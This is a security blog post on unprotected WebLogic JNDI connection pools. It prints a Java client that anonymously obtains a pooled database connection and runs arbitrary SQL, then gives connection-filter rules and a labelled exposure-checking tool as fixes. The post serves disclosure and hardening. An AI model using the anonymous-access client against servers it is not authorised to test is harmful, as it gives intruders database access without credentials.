Many of today's applications - enterprise and otherwise - are backed by some
type of database. Whether that database persists customer information,
product information, or anything else, it is essential that this resource be
protected. Now many of you may be saying, "My database account uses a 25
character random password that I can't even remember," and that is fine, but
does your application server know the password? The reason I ask is that many
of today's applications, especially enterprise apps, can't run on a plain web
server anymore. They have an enormous number of moving parts and
configuration options, and the components used to construct them require
some type of runtime that is generally provided by an application server.
Some of the most common application servers in use today include WebLogic
<http://www.bea.com/framework.jsp?CNT=index.htm&FP=/content/products/weblogic/>,
Tomcat <http://tomcat.apache.org/>, Sun Glassfish Application Server
<http://www.sun.com/software/products/appsrvr/>, JBoss
<http://www.jboss.org/>, and a few others. As a note, all examples provided
here are centered around BEA WebLogic version 9.2.

To get back to my original point, most of today's applications are backed by
some DBMS. To improve performance and efficiency, many of these applications
use the connection pooling provided by the application server to cache
connections to the backend database, thereby centralizing their database
connection management in one place. As an added benefit, in most cases the
application does not even need to know the credentials used to access the
database. In the case of WebLogic, the credentials are set when the
connection pool is created and are stored internally by the server. When
persisted to a file, the credentials are encrypted to prevent accidental
disclosure to anyone who has access to the filesystem; the key is not known
to the user. Now, the problem with this setup - from a security perspective,
of course - is that many developers/administrators do not secure these
connection pools. So what does that mean? It means that as long as someone
knows the name of the server (which they will have from the URL of the site)
and the JNDI name of the connection pool (WebLogic binds the pool to a JNDI
name), any client can simply ask the server for a connection to the
database. Who cares if your password is super long and "random", all I have
to do is ask for a connection. If you miss my point, it is simple - I don't
need to know your database password (generally considered the keys to the
kingdom) if I can simply ask for a connection and get one! If you are
wondering what a simple client that asks for a connection would look like,
here you go:

import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.Statement;
import java.util.Hashtable;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.sql.DataSource;

public class DataTest {

  public static void main(String[] args) {
    InitialContext ctx  = null;
    Connection     conn = null;
    Statement      stmt = null;
    ResultSet      rs   = null;

    // Host and port of the WebLogic server, e.g. taken from the site's URL
    String wlServer = "yourservername.com:andPort";
    // JNDI name the connection pool / data source is bound to
    String jndiName = "YourDataSource";

    try {
      // Anonymous JNDI context over t3: no WebLogic user or password is supplied
      Hashtable<String, String> ht = new Hashtable<String, String>();
      ht.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
      ht.put(Context.PROVIDER_URL, "t3://" + wlServer);
      ctx = new InitialContext(ht);

      // Ask the server for a pooled connection; the server supplies the DB credentials
      conn = ((DataSource) ctx.lookup(jndiName)).getConnection();

      // Placeholder query: the pooled connection runs whatever is put here
      String sql = "anything you want here";

      stmt = conn.createStatement();
      rs = stmt.executeQuery(sql);
      while (rs.next()) {
        // get results here
      }
    }
    catch (Exception e) {
      e.printStackTrace();
    }
    finally {
      try {
        if (rs != null)   { rs.close(); }
        if (stmt != null) { stmt.close(); }
        if (conn != null) { conn.close(); }   // hands the connection back to the pool
        if (ctx != null)  { ctx.close(); }
      }
      catch (Exception e) {
        e.printStackTrace();
      }
    }
  }
}


It really is that simple. The caveat to the above code, as I stated above, is
that it is WebLogic specific: for everything to work you will need
weblogic.jar on the classpath. It is simple enough to get if you are
interested, as it comes with every free download of WebLogic from BEA's
website.

Now, to fix this problem. In our case, WebLogic provides a mechanism to
filter incoming requests at the network layer. This mechanism is called
Connection Filtering
<http://edocs.bea.com/wls/docs92/secmanage/domain.html#wp1174122##jc1174122>.
From the docs: "Connection filters allow you to deny access at the network
level. They can be used to protect server resources on individual servers,
server clusters, or an entire internal network or intranet. For example, you
can deny any non-SSL connections originating outside of your corporate
network. Network connection filters are a type of firewall in that they can
be configured to filter on protocols, IP addresses, and DNS node names." To
set these up, simply follow the instructions provided here
<http://edocs.bea.com/wls/docs92/ConsoleHelp/taskhelp/security/ConfigureConnectionFiltering.html>
and you will be set.

A good rule of thumb is to only allow applications deployed on the machine,
or in the cluster, to access the configured connection pool. In addition,
you can set up security policies, groups, and users in the WebLogic server
so that a client has to present a credential set to access the resource even
if the connection filter lets its connection through. This is good practice,
because the filter only sees network addresses and protocols: to it,
localhost is localhost, and it cannot tell one application on that host (or
one client behind the same address) from another. Credentials, used in
conjunction with connection filtering, let you say that only apps on this
box that present this credential set are allowed to access this resource.
This is pretty useful if you are forced to house multiple applications on
the same server and each has a separate pool.
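As an added illustration of that rule of thumb (mine, not part of the
original post), here is a rule set for weblogic.security.net.ConnectionFilterImpl,
the filter implementation the console help page linked above configures.
Each line is "targetAddress localAddress localPort action protocols", the
rules are evaluated in order, and the addresses are made-up values for a
cluster living on 192.0.2.0/24 plus the server's own loopback address:

```text
192.0.2.0/24  *  *  allow  t3 t3s
127.0.0.1     *  *  allow  t3 t3s
0.0.0.0/0     *  *  allow  http https
0.0.0.0/0     *  *  deny
```

The first two rules let cluster members and local processes use the t3
protocol that the JNDI client above relies on, the third keeps the site
reachable for browsers, and the last rule denies everything else, including
t3 from the outside. Two caveats: WebLogic can tunnel t3 over HTTP if
tunneling is enabled on the server, in which case the third rule reopens the
path, so leave tunneling off; and the filter decides on the source address
it is handed, so clients behind a shared proxy or NAT all look alike to it.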

Try it out. It can't hurt. 
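To try it out in a way that reports the result, here is an added example (my
own, not part of the original post) that extends the client above into a
check. For each JNDI name given it first attempts an anonymous lookup and
getConnection(), which is exactly what an outsider would do, and then, if a
WebLogic user and password are supplied, repeats the attempt with those
credentials placed in the JNDI environment, which is how a client satisfies
a security policy on the data source. It runs no SQL; the connection's
metadata is enough to prove the pool handed out a connection and to show
which database account it uses. Host, JNDI names and credentials are
placeholders, and weblogic.jar is still required on the classpath.

```java
import java.sql.Connection;
import java.sql.DatabaseMetaData;
import java.sql.SQLException;
import java.util.Hashtable;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.sql.DataSource;

/**
 * Reports whether WebLogic data sources hand out connections to anonymous t3
 * clients, and whether they still do once a WebLogic user/password is supplied.
 * Added example; host, JNDI names and credentials are placeholders.
 *
 * Usage: java DataSourceExposureCheck t3://host:port user|- password|- jndiName...
 */
public class DataSourceExposureCheck {

  /** Outcome of one lookup + getConnection() attempt. */
  public static final class Attempt {
    public final String jndiName;
    public final String principal;   // null when the attempt was anonymous
    public final boolean connected;
    public final String detail;      // DB URL and account on success, error text otherwise

    Attempt(String jndiName, String principal, boolean connected, String detail) {
      this.jndiName = jndiName;
      this.principal = principal;
      this.connected = connected;
      this.detail = detail;
    }

    public String toString() {
      String who = principal == null ? "anonymous" : "as " + principal;
      return (connected ? "EXPOSED " : "denied  ") + jndiName + " (" + who + "): " + detail;
    }
  }

  /** JNDI environment for a t3 context; the WebLogic credentials are optional. */
  static Hashtable<String, String> env(String providerUrl, String user, String password) {
    Hashtable<String, String> ht = new Hashtable<String, String>();
    ht.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
    ht.put(Context.PROVIDER_URL, providerUrl);
    if (user != null) {
      // A WebLogic user in a role granted by the data source's security policy
      ht.put(Context.SECURITY_PRINCIPAL, user);
      ht.put(Context.SECURITY_CREDENTIALS, password);
    }
    return ht;
  }

  /** One attempt. No SQL is executed; metadata alone proves we hold a pooled connection. */
  public static Attempt tryConnect(String providerUrl, String jndiName, String user, String password) {
    InitialContext ctx = null;
    Connection conn = null;
    try {
      ctx = new InitialContext(env(providerUrl, user, password));
      DataSource ds = (DataSource) ctx.lookup(jndiName);
      conn = ds.getConnection();
      DatabaseMetaData md = conn.getMetaData();
      return new Attempt(jndiName, user, true, md.getURL() + " as " + md.getUserName());
    } catch (NamingException e) {       // lookup refused, name not bound, or server unreachable
      return new Attempt(jndiName, user, false, "JNDI: " + e.getMessage());
    } catch (SQLException e) {          // getConnection refused (policy) or pool failure
      return new Attempt(jndiName, user, false, "JDBC: " + e.getMessage());
    } finally {
      try { if (conn != null) conn.close(); } catch (SQLException ignored) { }
      try { if (ctx != null) ctx.close(); } catch (NamingException ignored) { }
    }
  }

  public static void main(String[] args) {
    if (args.length < 4) {
      System.err.println("usage: DataSourceExposureCheck t3://host:port user|- password|- jndiName...");
      System.exit(2);
    }
    String providerUrl = args[0];
    String user = "-".equals(args[1]) ? null : args[1];
    String password = "-".equals(args[2]) ? null : args[2];
    boolean anyExposed = false;
    for (int i = 3; i < args.length; i++) {
      Attempt anon = tryConnect(providerUrl, args[i], null, null);
      System.out.println(anon);
      anyExposed |= anon.connected;
      if (user != null) {
        System.out.println(tryConnect(providerUrl, args[i], user, password));
      }
    }
    // Non-zero exit when any pool answered an anonymous caller, so this can gate a deployment check
    System.exit(anyExposed ? 1 : 0);
  }
}
```

An EXPOSED line for the anonymous attempt is the problem described above.
Once connection filtering and a policy on the data source are in place, the
anonymous attempt should be denied and only the credentialed one should
connect. Run it both from a host the filter is meant to block and from one it
allows, since the filter decides on the source address, and keep the
WebLogic credentials out of scripts and shell history just as you would the
database password.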

Posted by Matt Presson

Ph4nt0m Security Team <http://www.ph4nt0m.org/> <http://blog.ph4nt0m.org/>